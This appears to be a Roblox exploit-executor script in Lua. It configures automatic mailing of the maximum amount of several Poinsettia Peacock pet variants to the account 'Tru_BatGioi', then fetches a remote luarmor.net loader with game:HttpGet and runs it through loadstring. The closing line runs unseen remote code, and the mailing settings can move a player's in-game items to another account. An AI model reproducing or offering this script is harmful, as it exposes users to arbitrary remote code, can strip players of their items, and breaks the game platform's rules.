getgenv().Settings = {
    Mailing = {
	["Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Golden Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Rainbow Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Shiny Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Shiny Golden Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Shiny Rainbow Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
    },
    Users = {
        "Tru_BatGioi",
        "",
        "",
    },
    ["Split Items Evenly"] = false,
    ["Only Online Accounts"] = false,
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()
